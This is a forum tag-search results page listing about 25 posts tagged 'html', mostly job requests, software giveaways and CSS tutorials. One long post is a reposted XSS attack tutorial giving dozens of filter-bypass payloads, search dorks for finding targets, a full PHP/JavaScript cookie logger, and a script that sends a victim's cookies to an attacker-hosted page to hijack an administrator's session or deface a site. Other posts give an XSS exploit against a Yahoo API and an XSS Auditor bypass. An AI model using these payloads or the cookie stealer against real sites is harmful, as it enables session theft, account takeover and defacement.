Jump to content

Search the Community

Showing results for tags 'html'.



More search options

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Informatii generale
    • Anunturi importante
    • Bine ai venit
    • Proiecte RST
  • Sectiunea tehnica
    • Exploituri
    • Challenges
    • Bug Bounty
    • Programare
    • Reverse engineering & exploit development
    • Mobile phones
    • Sisteme de operare si discutii hardware
    • Electronica
    • Wireless Pentesting
    • Black SEO & monetizare
  • Tutoriale
    • Tutoriale in romana
    • Tutoriale in engleza
    • Tutoriale video
  • Programe
    • Programe hacking
    • Programe securitate
    • Programe utile
    • Free stuff
  • Discutii generale
    • RST Market
    • Off-topic
    • Discutii incepatori
    • Stiri securitate
    • Sugestii
    • Linkuri
    • Cosul de gunoi
    • Cryptocurrency
  • Cumparaturi online's Topics
  • Club Test's Topics
  • Clubul saraciei absolute's Topics
  • Cumparaturi online's Test
  • Chernobyl Hackers's Topics
  • Programming & Fun's Jokes / Funny pictures (programming related!)
  • Programming & Fun's Programming
  • Programming & Fun's Programming challenges
  • Bani pă net's Topics
  • Web Development's Forum

Categories

There are no results to display.

There are no results to display.

Blogs

There are no results to display.

There are no results to display.


Location


Interests


Biography


Location


Interests


Occupation

Found 28 results

  1. Ajutor HTML, PHP - Search form

    Salut, cum as putea seta un search form in html ca atunci cand introduc de exemplu cuvantul "pepsi" intr-o casuta si dau click pe un buton sa imi deschida fisierul din host numit "pepsi.txt" ?
  2. HTML & CSS

    Ar putea careva sa ma ajute cu niste explicatii si indrumari in domeniul HTML SI CSS ? In momentul de fata invat si lucrez mai mult pe telefon in aplicatia Solo Learning . Inca nu am un calculator la care sa lucrez dar considet ca diferenta nu ar fi asa mare atata timp cat invat . Daca este cineva care foloseste aplicatia Solo Learning si ar dori sa ma ajute i-as fi recunoscator.
  3. Site in HTML

    Salut Caut un tip care sa-mi modifice si sa-mi actualizeze un site in HTML. Nu este nimic complicat ori deosebit. Mesajele in PM. P.S... preferam un CMS Multumesc
  4. CSE HTML Validator is a powerful, easy to use, user configurable, and all-in-one HTML, XHTML, CSS, link, spelling, JavaScript, PHP syntax, SEO, and accessibility checker. One-click HTML, CSS, JavaScript, SEO, spelling, accessibility, and link checking with CSE HTML Validator saves you time and helps you eliminate website problems that cause visitors to leave your website. Get it now! Read more at Free CSE HTML Validator (100% discount) - SharewareOnSale
  5. eval(function(p,a,c,k,e,d){while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+c.toString(a)+'\\b','g'),k[c])}}return p}('$(5(){k i={3:"?"};$(\'#a\').8({1:0,6:0,c:3,b:5(h,2){g(2.1!=3){$(\'#a-1\').4(e(2.1))}7{$(\'#a-1\').4("f")}}});$(\'#9\').8({1:0,6:0,c:3,b:5(h,2){g(2.1!=3){$(\'#9-1\').4(e(2.1))}7{$(\'#9-1\').4("f")}}});$(\'#d\').8({1:j,6:0,c:3,b:5(h,2){g(2.1!=3){$(\'#d-1\').4(e(2.1))}7{$(\'#d-1\').4("f")}}})});',21,21,'|value|ui|100000|text|function|min|else|slider|slider2|slider1|slide|max|slider3|numberWithCommas|Max|if|event|p|1000|var'.split('|'))) sau de unde pot sa incep sa inteleg si eu ce este aici? inteleg ca este js,dar ma gandesc ca ar fi si alte modalitati sa aflu ce este aici, am inceput sa invat html la scoala dar mi se parea plictisitor,am reinceput sa invat singur acasa,dar am inceput editand html,nu as avea rabdare sa trec prin tot de la baza,nici nu am de gand sa devin expert html sau altceva,doar sa ma pot descurca la orice am nevoie, asa pseudo profesionist in toate stil clasic romanesc
  6. HTML editor /Php

    Am diferite proiecte in curs de executie si am nevoie de un baiat bun pe html, php pentru a-mi face diferite pagini, scripturi. PM pentru detalii !
  7. Free PHP , HTML ,CSS...

    Download here Free PHP, HTML, CSS, JavaScript editor (IDE) Codelobster PHP tanks
  8. Nu m-am putut ab?ine s? nu m? abonez la ei ?i m-am gândit s? împ?rt??esc cu voi lec?iile a?a zisor "Gagici care te înva?? programare" . 1.INTERNET INTRO 2.HTML 3.CSS 4.Programming 5.PHP 6.SEO
  9. Product Description CSE HTML Validator Standard for Microsoft Windows is a powerful, easy to use, user configurable, and all-in-one HTML, XHTML, CSS, link, spelling, JavaScript, PHP syntax, SEO, and accessibility checker. CSE HTML Validator helps eliminate website problems that cause visitors to leave your website. It increases your productivity and saves you time and money. Unlike many other HTML checkers, CSE HTML Validator features an unusually powerful custom syntax checking engine that is specifically designed to check HTML, XHTML, and CSS. CSE HTML Validator Standard offers all the same powerful features (with a few exceptions) of CSE HTML Validator Professional. Both standard and professional editions offer the exact same level of powerful syntax checking, including CSS, accessibility and link checking. CSE HTML Validator for Microsoft Windows is a powerful, easy to use, user configurable, and all-in-one HTML, XHTML, and CSS checker that also includes an SEO (search engine optimization) checker, a link checker, spell checker, accessibility checker, and built-in editor. CSE HTML Validator Standard 12 (100% Discount)
  10. SilaxHe from Rusia

    I'm a one of administrator at Security0ne! My nick name is SilaxHe, i'm from Rusia. My Skillz: HTML / JS / PHP /Python / Bash. I'm Glad to be here.
  11. Hello and thanks for reading this tutorial on XSS, written by me. You may be asking as to why I'm creating this tutorial. My inbox has lately been flooding, and I've recieved a lot of requests on making this tutorial. I've posted my XSS attacks on Google, Facebook, Defense.gov, and other huge sites. I've even exploited HackForums' security with XSS. What is XSS? XSS stands for Cross-Site-Scripting. It is basically an attack, that is used to execute HTML and Javascript on the web-page. This attack can be done by submitting queries into text-boxes, or even into the URL. The results come back reading the text as HTML, so it executes the scripts instead of displaying them in plain text. With an XSS attack, you can steal cookies from a Web-Administrator, or even use some social-engineering to manipulate someone into download a virus that you've created. Such as a Botnet, or RAT, maybe even a Keylogger. XSS can be very dangerous, but can also be very mild. Most of my attacks are mild XSS attacks, that can be difficult to use against a website. There are many ways to use XSS to your advantage. I will name a few examples. You can use an alert box to advertise yourself, or alert the web-admin that you've discovered a security breach involving XSS. You can also setup a Cookie-Stealer/Logger. Anything you can do with HTML, can be used against a site with this attack. I will explain some of the most important terms associated with XSS. What is HTML and Javascript? HTML HTML is sort of like a programming language. The distinctions between a programming language, and HTML, are not too far apart. They are both languages, that are used to create attributes, and events. HTML is a markup language, which is used mostly to create websites. HTML stands for Hyper-Text Markup Language. You can use HTML to create forms, buttons, and other stuff that can be used in a webpage. I highly doubt you will ever encounter a website that does not contain even a slight amount of HTML. Javascript Now, first, let's get one thing straight. There is a HUGE difference between JAVA and JAVASCRIPT. Java, is a language that ressembles to C++, it can be used in games, and applications. Javascript is sort of similar to HTML, but definitely different in many ways. Javascript isn't used NEARLY as much in Webpages than HTML is. Javascript is used, more in applications outside of webpages. Like PDFs. Javascript can be an incredibly useful language along with HTML. They are both fairly simple to learn, and are very dynamic. XSS: My first attack. Now, let's start getting into the really good stuff. In this section, I'll be explaining how to use XSS to your advantage. We will also be launching our very first attack with XSS, if you know the basics to XSS, you can skip this section, because I doubt you will learn anything that you don't briefly know yet. Now, our first step, is obviously to find a vulnerable site. Finding a site vulnerable to XSS is a lot easier than finding a site vulnerable to SQLi. The problem is, it can take time to determine whether the site is really vulnerable. With SQLi, you can just add a little '. But in XSS, you must submit (sometimes) multiple queries, to test your site for XSS. Most vulnerable sites will contain a Search, Login, or a Register area. Pretty much anywhere that contains a text-box, can be exploited with XSS. HOWEVER, many people forget this fact, and never use it to their full potential because they think it's useless. You can exploit XSS through the source aswell. You can't just take any script, and edit the full thing. But editing an "onmouseover" script, is definitely an exception. I will be explaining this method of XSS later on, for now, we need the complete basics. Anyways, our site should have some Text-Boxes to input some HTML in. I will simply be using a search bar. So, lets try putting in the most known, BASIC query of all time. <script>alert("XSS")</script> That little script, is HTML. It will make a little message pop up, saying "XSS". You can edit that part if you like. Just don't edit any other parts of the script. Put that into your search bar, and hit enter. Now, if a little alert box popped up, you've successfully attacked a site vulnerable to XSS! If no box popped up, that is alright, because that means the site has taken some time to put in a filter. A filter, is when we search something, then it goes through a mini process, basically an inspection. It checks for any malicious (dangerous) things. In this case, it will look for XSS. Sometimes, these filters are very weak, and can be by-passed very easily, other times, they can be quite difficult to bypass. There are a lot of ways to bypass an XSS filter. First, we have to find out what the filter is blocking. A lot of the time, it is blockin the alert. Here's an example of this kind of filter: <script>alert("XSS")</script> > <script>alert( > XSS DETECTED < )</script> It will block the quotes. So how the hell do we get passed that? Well, thankfully there's a way to encrypt the full message . We will be using a little function called "String.FromCharCode". The name of it pretty much explains it all. It encrypts our text, into ASCII. An example of this encryption, would be like this: String.fromCharCode(88,83,83) Yes, it can be a little bit confusing, but with a little bit of explaining, and testing, it is quite simple. Here is what our full query will look like: <script>alert(String.fromCharCode(88,83,83))</script> You do NOT need ANY quotes in the simple query like that. So lets put that back in the search bar, and voila! It worked! We got an alert box saying "XSS"! If you still didn't get any alert box, try some of these queries that I like to use: "><script>alert("XSS")</script> "><script>alert(String.fromCharCode(88,83,83))</script> '><script>alert("XSS")</script> '><script>alert(String.fromCharCode(88,83,83))</script> <ScRIPt>aLeRT("XSS")</ScRIPt> <ScRIPt<aLeRT(String.fromCharCode(88,83,83))</ScRIPt> "><ScRIPt>aLeRT("XSS")</ScRIPt> "><ScRIPt<aLeRT(String.fromCharCode(88,83,83))</ScRIPt> '><ScRIPt>aLeRT("XSS")</ScRIPt> '><ScRIPt<aLeRT(String.fromCharCode(88,83,83))</ScRIPt> </script><script>alert("XSS")</script> </script><script>alert(String.fromCharCode(88,83,83))</script> "/><script>alert("XSS")</script> "/><script>alert(String.fromCharCode(88,83,83))</script> '/><script>alert("XSS")</script> '/><script>alert(String.fromCharCode(88,83,83))</script> </SCRIPT>"><SCRIPT>alert("XSS")</SCRIPT> </SCRIPT>"><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT>">"><SCRIPT>alert("XSS")</SCRIPT> </SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> ";alert("XSS");" ";alert(String.fromCharCode(88,83,83));" ';alert("XSS");' ';alert(String.fromCharCode(88,83,83));' ";alert("XSS") ";alert(String.fromCharCode(88,83,83)) ';alert("XSS") ';alert(String.fromCharCode(88,83,83)) Yes, I just wrote all those down, and it took longer than it should've, but they all work in their own way, so try as many of them as you can. I've attacked some pretty huge sites with some of those queries. I create my own queries sometimes, you should create some too, they can come in handy a lot. XSS: Advanced Methods Now, in this section I will be sharing some ways to use XSS maliciously against a site. Now, keep in mind all malicious attacks sent over to a system, site, or server, is illegal and you CAN be prosecuted for these actions. So ALWAYS use protection if you're planning on doing something malicious to the site. If you want to make a little alert box pop up, you shouldn't need a Proxy/VPN. Cookie Stealing/Logging Now, cookie stealing is about the most malicious thing we can do with Non-Persistent XSS. A cookie stealer/logger, will log the cookies of the user who access the page to a certain document. The easiest way to do this, would be with a three step process. First, you should setup a site. Personally, I find http://www.000webhost.com/ the best for upload malicious code, programs, or anything else. So go ahead and register there. Now, once you've created your site, go to the file manager. Create a new file. Call it "CookieLog.txt". Leave the code blank. Now, create another file after that, called "CookieLogger.php". In CookieLogger.php, we need to add some code, so that it sends the cookies that we log, into our Cookie Log. Add this code, into it (Just make sure the file name has .php, or else it will not run the PHP code (Which is an enormous problem)). <?php /* * Created on 16. april. 2007 * Created by Audun Larsen (audun@munio.no) * * Copyright 2006 Munio IT, Audun Larsen * * THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR IMPLIED WARRANTIES, * INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS * FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES * (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; * OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, * EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. */ if(strlen($_SERVER['QUERY_STRING']) > 0) { $fp=fopen('./CookieLog.txt', 'a'); fwrite($fp, urldecode($_SERVER['QUERY_STRING'])."\n"); fclose($fp); } else { ?> var ownUrl = 'http://<?php echo $_SERVER['HTTP_HOST']; ?><?php echo $_SERVER['PHP_SELF']; ?>'; // == // URLEncode and URLDecode functions // // Copyright Albion Research Ltd. 2002 // http://www.albionresearch.com/ // // You may copy these functions providing that // (a) you leave this copyright notice intact, and // ( if you use these functions on a publicly accessible // web site you include a credit somewhere on the web site // with a link back to http://www.albionresearch.com/ // // If you find or fix any bugs, please let us know at albionresearch.com // // SpecialThanks to Neelesh Thakur for being the first to // report a bug in URLDecode() - now fixed 2003-02-19. // And thanks to everyone else who has provided comments and suggestions. // == function URLEncode(str) { // The Javascript escape and unescape functions do not correspond // with what browsers actually do... var SAFECHARS = "0123456789" + // Numeric "ABCDEFGHIJKLMNOPQRSTUVWXYZ" + // Alphabetic "abcdefghijklmnopqrstuvwxyz" + "-_.!~*'()"; // RFC2396 Mark characters var HEX = "0123456789ABCDEF"; var plaintext = str; var encoded = ""; for (var i = 0; i < plaintext.length; i++ ) { var ch = plaintext.charAt(i); if (ch == " ") { encoded += "+"; // x-www-urlencoded, rather than %20 } else if (SAFECHARS.indexOf(ch) != -1) { encoded += ch; } else { var charCode = ch.charCodeAt(0); if (charCode > 255) { alert( "Unicode Character '" + ch + "' cannot be encoded using standard URL encoding.\n" + "(URL encoding only supports 8-bit characters.)\n" + "A space (+) will be substituted." ); encoded += "+"; } else { encoded += "%"; encoded += HEX.charAt((charCode >> 4) & 0xF); encoded += HEX.charAt(charCode & 0xF); } } } // for return encoded; }; cookie = URLEncode(document.cookie); html = '<img src="'+ownUrl+'?'+cookie+'">'; document.write(html); < ?php } ?> Now that we have our Cookie Logger script, we can send the cookie logger to our best friend, the Web-Admin . To do this, we should probably Tiny the URL. Or if you can figure out how to Spoof the URL, that will work too. To Tiny the URL, go to SPAM and just put in the URL. But hold one, we need to add a script into our XSS vulnerability. This is the script that will start our Cookie Logging. <script>document.location="http://www.host.com/mysite/CookieLogger.php?cookie=" + document.cookie;</script> So just add that script after the URL, then tiny it, and send it to our Web-Admin, now this can take some time for the Admin to actually click it. Sometimes, the Admin won't click it, so if it takes too long, you should just give up and find another way to exploit it. Once you get the cookie, you can use "Cookie Manager" Firefox addon to manipulate and edit the cookies so that you can hijack the administrators session. I find Cookie Manager a very useful app for XSS, make sure to download it. Defacing Defacing is one of the most common things people like to do when they have access to multiple administrator options. Mostly so that they can advertise themselves, and simply let the administrator know that their security has been breached. Anyways, defacing with XSS requires persistent XSS, maybe a comment box, or something. You can use this script to create a re-direct to your deface page (You should probably redirect it to your deface on Pastehtml.com, because it's anonymous uploading.) <script>window.location="http://www.pastehtml.com/YOURDEFACEHERE/";</script> XSS: Onmouseover Onmousover isn't a very exploitable vulnerability. But yet, it is still considered XSS. An onmouseover vulnerability would look something like this: onmouseover=prompt1337 We can exploit this, by editing it to: onmouseover=alert("XSS") Very basic vulnerability, but it's getting more noticed, and patched in a lot more websites. Most sites will use Adobe Flash or CSS to do those kind of effects now. XSS Filter Bypassing Techniques Sometimes a simple XSS query just won't do the trick. The reason your query isn't working, is because the website has a WAF or Filter set in place. A filter will block as many XSS and SQLi queries as possible. In this case, we're dealing with XSS. There are many ways on bypassing XSS filters, but I will only explain a few. Hex Bypassing With blocked characters like >, <, and /, it is quite difficult to execute an XSS query. Not to worry, there's always a solution You can change your characters, into Hex. A Hex of a certain character, is basically the character, but in a different format. These should help you out: > = %3c < = %3c / = %2f ASCII Bypassing With an ASCII encryption, we can use the character ". Which is blocked quite a bit. This is one of the most common XSS Filter bypasses of all time. A script that you would need to encrypt, would look like this: NOT WORKING SCRIPT <script>alert("XSS")</script> WORKING SCRIPT <script>alert(String.fromCharCode(88,83,83))</script> To encrypt your little part of a script, go to this site: http://www.wocares.com/noquote.php I use that site, and find it quite useful. Case-Sensitive Bypassing This kind of bypass rarely works, but it's always worth a shot. Some filters are set in place to detect certain strings, however, the filter's strings that are blocked are CASE SENSITIVE. So all we need to do, is execute a script, with different sizes of characters. This bypass, would look like this: <ScRiPt>aLeRt("XSS")</ScRiPt> You can also mix that with ASCII encryption if you like. This kind of bypass only works on really stupid filters, or really REALLY old ones. Some XSS Dorks It's usually best to create/find your own dorks, but in this tutorial, I'll write some up real quick to share: inurl:search.php? inurl:find.php? inurl:search.html inurl:find.html inurl:search.aspx inurl:find.aspx Those dorks are about as basic as they can get, sorry if they do not satisfy you. I rarely use dorks, and with this tutorial you shouldn't need to use dorks to find a vulnerable site. XSS is a very popular vulnerability. Even in google I found some. Some in HackForums too. XSS isn't a very high-priority, at least not Non-Persistent. Source : Hack Forums - Site Challenge
  12. /*********************************************************************************** ** Exploit Title: Yahoo Query Language Cross Site Scripting Vulnerability ** ** Exploit Author: Peyman D. aka C4T ** ** Vendor Homepage : http://query.yahooapis.com/ ** ** Google Dork: none ** ** Date: 2015-03-08 ** ** Tested on: Windows 7 / Mozila Firefox ** ************************************************************************************ ** Exploit Code: ****************** <html xmlns="http://www.w3.org/1999/xhtml"> <body> <span>Discovered by Peyman D.</span> <span>aka C4T</span> <script> alert('Successfully Exploited'); </script> </body> </html> ************************************************************************************ Location & Vulnerable query: ****************** http://query.yahooapis.com/v1/public/yql?q= select * from html where url='[attacker-website.com]/exploit.html' and xpath='html' ************************************************************************************* ** Proof: ****************** Executable script tag in API's own page: Malicious source: http://hatrhyme.com/alert.html Exploit query: http://query.yahooapis.com/v1/public/yql?q= select * from html where url='http://hatrhyme.com/alert.html' and xpath='html' ------------------------------------------------------- Injecting HTML tags in API's own page: Malicious source: http://hatrhyme.com/expl.html Exploit query: http://query.yahooapis.com/v1/public/yql?q= select * from html where url='http://hatrhyme.com/expl.html' and xpath='html' ------------------------------------------------------- ****************************************************************************************** ** ** Explanation and the cause of this vulnerability: ** ** http://hatrhyme.com/XSSInYQL.pdf ** ****************************************************************************************** Source
  13. 78 WordPress and HTML Themes

    Free 78 WordPress and HTML Themes. Download : http://www.mediafire.com/download/mjyys6kiobpu076/Themes.rar
  14. Ajutor script php html

    Caut pe cineva care se pricepe la PHP - HTML ! PM pentru a vorbi mai multe !
  15. Product Description CSE HTML Validator Standard for Microsoft Windows is a powerful, easy to use, user configurable, and all-in-one HTML, XHTML, CSS, link, spelling, JavaScript, PHP syntax, SEO, and accessibility checker. CSE HTML Validator helps eliminate website problems that cause visitors to leave your website. It increases your productivity and saves you time and money. Unlike many other HTML checkers, CSE HTML Validator features an unusually powerful custom syntax checking engine that is specifically designed to check HTML, XHTML, and CSS. CSE HTML Validator Standard offers all the same powerful features (with a few exceptions) of CSE HTML Validator Professional. Both standard and professional editions offer the exact same level of powerful syntax checking, including CSS, accessibility and link checking. CSE HTML Validator for Microsoft Windows is a powerful, easy to use, user configurable, and all-in-one HTML, XHTML, and CSS checker that also includes an SEO (search engine optimization) checker, a link checker, spell checker, accessibility checker, and built-in editor. Just open an HTML, XHTML, or CSS document with CSE HTML Validator and tell it to do its thing by pressing F6! Easy to understand syntax errors, warning and other messages will appear below the source of your document. Simply click on one of these messages and you will be taken to the place in your document where the problem is. Fix the problem with the integrated editor, check the document again (to make sure that the problem is fixed), and then save it when you’re finished. The Batch Wizard, included in the professional edition, lets you easily check/validate multiple files and/or URLs and will generate a neatly formatted HTML report with the results. The Batch Wizard can follow links to check an entire small to medium sized web site or part of a large one. It also includes a spell checker and link checker. If you think that you’re writing clean HTML, then you’ll be surprised at what CSE HTML Validator will find in your documents! CSE HTML Validator is an indispensable tool for any HTML author. An evaluation version of CSE HTML Validator Professional is available as a FREE download for you to try before you buy. CSE HTML Validator Lite, a less powerful but free edition, is also available. CSE HTML Validator Helps You Quickly Fix Your HTML Checks/validates an entire website (or part of it) given one URL or folder with the Batch Wizard (Pro+) Checks/validates a specified list of documents with the Batch Wizard (Pro+) Finds misspelled and invalid tag names, tag attributes, tag attribute values, and character entities Finds missing and mismatched quotation marks Finds missing or extra end tags Checks for accessibility issues based on Section 508 US Government Standards and/or the industry standard Web Content Accessibility Guidelines 1.0 (WCAG 1.0) or 2.0 (WCAG 2.0) (Std+) Checks CSS syntax (Std+) Checks the HTML and CSS output of dynamic pages (such as ASP and PHP pages) as you browse a website in the integrated web browser Checks for issues that can affect search engine rankings (Std+) Makes suggestions and gives tips to improve search engine rankings (Std+) Detects incorrect placing and nesting of tags Alerts you to incorrect or incompatible HTML based on a specific browser or HTML version (for example, notifies you of many Netscape specific or Internet Explorer specific tags, attributes, and attribute values) Finds deprecated tags, attributes, and CSS (Std+) Finds bad design issues and suggests improvements (Std+) Finds broken links (Std+) Finds misspelled words Product Homepage Here -> Download <-Deal Expires in: EXPIRED!
  16. XSS Auditor bypass

    XSS Auditor is getting pretty good at least in the tests I was doing however after a bit of testing I found a cool bypass. Without studying the code it seems that it checks for valid JavaScript within the vector, I thought I could use this to my advantage. I came up with the idea of using an existing script block to smuggle my vector and reusing the closing script on the page. The page contains a script block like this: <script>x = "MY INJECTION"</script> As every XSS hacker knows you can use a “</script>” block to escape out of the script block and inject a HTML XSS vector. So I broke out of the script block and used the trailing quote to form my vector. Like so: </script><script>alert(1)+" You could of course use a standard ",alert(1)," but what if quotes are filtered? I then came up with the idea of using SVG and an HTML escaped quote. This bypasses the filter and is a HTML XSS vector that doesn’t have a DOM vulnerability so it’s within scope of the filter and is very common in my experience. Here is the final vector: <script> x = "</script><svg><script>alert(1)+""; XSS auditor PoC: HERE Source
  17. Caut om care stie sa lucreze in php , html sau javascript . PM pentru detalii.
  18. Prestez servicii PHP, HTML, CSS

    Salut, Prestez servicii PHP, HTML, CSS gratis daca-i un proiect micut care nu necesita mult timp sau proiecte mai maricele pentru o suma modica. Lucrez cu laravel si bootstrap. Fac asta pentru experienta si portofoliu. Cei ce sunteti interesati, lasati-mi PM cu informatii. Multumesc.
  19. Help. [HTML MAP/Rollover Image]

    Salut. Are cineva idee in ce sau cum esta facuta aceasta harta? http://pastebin.com/9nuCN6tn executari dot com Multam` frumos.
  20. Salutare tuturor. E?ti în c?utarea unui website profesional? Lua?i primul pas spre noul proiect al dvs. ?i contacta?i-m?. Prestez servicii web profesionale, atât front cât ?i back-end (@EAdrian) în conformitate cu standardele actuale. Ata?ez mai jos ni?te lucr?ri pentru a v? face o idee despre modul în care lucrez. A?adar: Automobile layout FaceTrips - Travel Elite Baseball Academy and Travel Teams Focus Kids Focus Kids - sign up page Website for a professional Call of Duty player Instant Teleseminar website Quiz game Clean, Relaxing Home Page for MassageTableRentals Personal website for Manuel Pasquato Vescovo Automotive Next Big Stock Video/Photo Site Travel hotels Wordpress theme Food Event Medical website Medical Marijuana layout The Neuromarketing Labs Dating sites and ranks Gaming website MMO Games Portal page Gaming website Online game forum (Baldur's Gate: Enhanced Edition Forums) Gaming website Landing page for Ray Junior Landing page for wedding website School auth. page Mul?umesc pentru timpul acordat ?i a?tept un feedback din partea voastr?. Toate cele bune, GPaul. P.S. : Îmi rezerv dreptul de a alege clien?ii.
  21. Today we are going to show you how to mask images with shapes plus some nifty zoom animation effects with just HTML & CSS. I have seen this kind of styling and effect in many portfolio websites and let me show you how it's made. Personally, I don't think we should withhold ourself from using new technology or technique such as CSS3 on web projects because of old browsers don't support them. I believe we should "reward" users with modern browser by giving them a better user experiences. Therefore, I enjoy using CSS3 in my projects, but of course, we have to make sure it can degrades gracefully or at least display well in old browsers. This tutorial will be using CSS3 transform which means, old browsers will not show the zooming effect. Good news is, I have coded it, even if it's old browsers, it will still look pretty good and usable. If you want something hardcore, you can check out my previous tutorial - Create Beautiful Hexagon Shape With Pure CSS3. Here are some of the websites that are using the similar way in theirs portfolio page: IMAGES We want this example to be usable in most browsers, therefore, we're not going to draw the shape using CSS3 or whatever fancy techniques. We stick to the ancient way - transparent PNG. This is how each of the shape looks like: HTML To make it easy to understand, I have made an image to illustrate what each layer does. <div class="shape"> <a href="{URL}" class="overlay {round|hexagon|pentagon}"></a> <div class="details"> <span class="heading">{TITLE}</span> <hr /> <p>{DESCRIPTION}</p> <a href="{URL}" class="button">VIEW</a> </div> <div class="bg"></div> <div class="base"> <img src="{IMAGE URL}" alt="" /> </div> </div> In case you need the fonts I used in this tutorial, here is it: <link href='http://fonts.googleapis.com/css?family=Abel' rel='stylesheet' type='text/css'> <link href='http://fonts.googleapis.com/css?family=Roboto+Slab' rel='stylesheet' type='text/css'> <link href='http://fonts.googleapis.com/css?family=Roboto+Condensed:400,700' rel='stylesheet' type='text/css'> CSS We don't have Javascript in this tutorial. We use :hover pseudo code and also CSS animation to do simple mouseover and zooming effects. Here is the portion of code that does all these animation effects: ...... .shape .overlay { display:block; width: 310px; height: 310px; position: absolute; top:-5px; left:-5px; -webkit-transform: scale(1,1); -webkit-transition-timing-function: ease-out; -webkit-transition-duration: 0.6s; -moz-transform: scale(1,1); -moz-transition-timing-function: ease-out; -moz-transition-duration: 0.6s; transform: scale(1,1); transition-timing-function: ease-out; transition-duration: 0.6s; z-index:500; /* allow user to actually perform actions underneath this layer */ pointer-events:none; background-repeat: no-repeat; } ...... /* hover effect */ .shape:hover .overlay { -webkit-transform: scale(1.07,1.07); -webkit-transition-timing-function: ease-out; -webkit-transition-duration: 0.3s; -moz-transform: scale(1.07,1.07); -moz-transition-timing-function: ease-out; -moz-transition-duration: 0.3s; } .shape:hover .bg { -ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=80)"; filter: alpha(opacity=80); -moz-opacity: 0.8; -khtml-opacity: 0.8; opacity: 0.8; display:block; } .shape:hover .details { -ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)"; filter: alpha(opacity=100); -moz-opacity: 1; -khtml-opacity: 1; opacity: 1; z-index:450; display:block; } ...... Here is the full CSS: .shape { width: 300px; height: 300px; position: relative; } .shape .overlay { display:block; width: 310px; height: 310px; position: absolute; top:-5px; left:-5px; -webkit-transform: scale(1,1); -webkit-transition-timing-function: ease-out; -webkit-transition-duration: 0.6s; -moz-transform: scale(1,1); -moz-transition-timing-function: ease-out; -moz-transition-duration: 0.6s; transform: scale(1,1); transition-timing-function: ease-out; transition-duration: 0.6s; z-index:500; /* allow user to actually perform actions underneath this layer */ pointer-events:none; background-repeat: no-repeat; } /* different shapes */ .shape .overlay.round { background: url(round.png); } .shape .overlay.hexagon { background: url(hexagon.png); } .shape .overlay.pentagon { background: url(pentagon.png); } /* hover effect */ .shape:hover .overlay { -webkit-transform: scale(1.07,1.07); -webkit-transition-timing-function: ease-out; -webkit-transition-duration: 0.3s; -moz-transform: scale(1.07,1.07); -moz-transition-timing-function: ease-out; -moz-transition-duration: 0.3s; } .shape:hover .bg { -ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=80)"; filter: alpha(opacity=80); -moz-opacity: 0.8; -khtml-opacity: 0.8; opacity: 0.8; display:block; } .shape:hover .details { -ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)"; filter: alpha(opacity=100); -moz-opacity: 1; -khtml-opacity: 1; opacity: 1; z-index:450; display:block; } /* content styles */ .shape .bg, .shape .details { position: absolute; width: 300px; height:300px; display:table-cell; vertical-align:middle; text-align:center; top:0; left:0; opacity:0; -webkit-transition: all 0.3s ease; -moz-transition: all 0.3s ease; -o-transition: all 0.3s ease; transition: all 0.3s ease; display:none; } .shape .bg { background: #4b5a78; } .shape .details span.heading { font-family: 'Roboto Condensed', serif; font-size:30px; display:block; margin-top:70px; color:#fff; text-decoration:none; } .shape .details p { font-family: 'Abel', sans-serif; color:#fff; width: 70%; font-size:14px; margin:0 auto; } .shape a.button { padding:5px 15px; font-family: 'Abel', sans-serif; font-size:12px; -webkit-border-radius: 20px; -moz-border-radius: 20px; -ms-border-radius: 20px; -o-border-radius: 20px; border-radius: 20px; background: #2f3644; text-decoration:none; color:#fff; display:block; width:50px; margin:0 auto; text-align:center; margin-top:15px; } .shape a.button:hover { background: #fff; color: #2f3644; } Conclusion That's it, pretty simple to make and look elegant too. You can change the shape to whatever you want. This tutorial is tested on IE8 and should work in most modern browsers. If you have any questions, drop a comment. Demo | Download Source Author: Kevin Liew
  22. Ofer 30 usd LR unei persoane pricepute cu timp/chef de munca pentru a crea clona unui site (doar interfata) in php/html. Proiectul poate fi finalizat in mai putin de 2 ore. Panaramele sa se abtina. Detalii in privat.
  23. Today, we introduce a new unit to Code Year: HTML and CSS. You'll learn how to build and customize webpages, and eventually combine this with your JavaScript knowledge to add interactivity and animation to websites. Code Year » Week 13: Build a Webpage Code Year: Week 13: Build a Webpage | Codecademy via mail
  24. html/css

    Salut, Ma intreb, in afara de HTML si CSS ce este indicat sa mai stii ca sa poti face ceva mai ok ? Browser Scripting - JavaScript si jQuery / AJAX ? Server Scripting - PHP ? Multumesc, Greenbytes
  25. Instant documentation search [ CSS | HTML | JavaScript | DOM | jQuery | PHP ] Link Source
×